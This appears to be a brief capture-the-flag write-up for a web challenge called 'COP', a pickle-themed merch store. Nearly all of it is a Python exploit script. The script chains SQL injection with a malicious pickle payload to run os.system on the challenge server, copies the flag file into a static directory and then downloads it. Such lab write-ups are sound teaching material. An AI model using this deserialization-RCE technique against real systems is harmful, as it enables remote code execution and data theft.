153 words
1 minutes
COP
NOTEDescription The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!
Solution:
import pickle
import base64
import os
import requests
# Payload to be executed on the server
payload = 'cp flag.txt application/static/achux21.txt'
# Class definition for creating a serialized payload using Pickle
class RCE:
def __reduce__(self):
return os.system, (payload,)
# If the script is run directly, not imported as a module
if __name__ == '__main__':
# Serialize the payload using Pickle and encode it in base64
var = base64.urlsafe_b64encode(pickle.dumps(RCE())).decode('ascii')
# Craft a URL to trigger the SQL injection vulnerability
# The UNION SELECT statement is used to inject the serialized payload
r = requests.get(f"http://167.99.82.136:30931/view/%27%20UNION%20SELECT%27{var}")
# Retrieve the result of the executed payload
flag = requests.get(f"http://167.99.82.136:30931/static/achux21.txt")
# Print the result (flag)
print(flag.text)